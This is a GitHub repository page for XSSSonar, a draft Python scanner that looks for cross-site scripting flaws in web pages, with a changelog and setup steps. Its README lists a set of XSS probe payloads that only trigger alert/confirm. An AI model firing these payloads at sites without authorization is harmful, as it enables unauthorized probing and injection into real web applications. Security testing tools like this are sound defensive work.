Skip to content
Little python tool to look for XSS vulnerabilities in a web page
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md
xsssonar.png
xsssonar.py

README.md

XSSSonar

Little tool to look for XSS vulnerabilities in a web page.

XSS Sonar Screenshot

Info

This code is just a draft. There are some errors still to be corrected, and sometimes false positives occur.
Test with Python 2.7.9 on Debian Jessie. I'll write it for Python 3.x maybe.

ChangeLog

0.1.6
[-] Fixed some bugs
[-] Added scan on list of POST parameters
[-] Added option to assign default value to a POST parameter
[-] Added help function

0.1.5a
[-] Fixed some bugs
[-] Less than 400 lines of code

0.1.5
[-] Added scan on POST parameters
[-] Changed name

0.1.4a
[-] Added stopwatch to know the time spent to check each URL
[-] Same features with 1500 lines of code missing

0.1.4
[-] Check a single URL or a list.txt of sites

List of XSS Payloads

'">"'><img src=x onerror=confirm`XSS`>
"> <script>alert`XSS`</script>
'">"'><svg onload=confirm`XSS`>
"',;</script><script>confirm`XSS`</script>
'><svg onload=confirm`XSS`>
"><svg/onload=confirm`XSS`//
"><details/open/ontoggle=confirm`XSS`>
" onfocus="confirm`XSS`" autofocus=""
" onclick="confirm`XSS`"
" onmouseover="confirm`XSS`"
\"-confirm`XSS`//
\'-confirm`XSS`//
"-confirm`XSS`-"'-confirm`XSS`-'

To start

pip install fake-useragent
python xsssonar.py

You can’t perform that action at this time.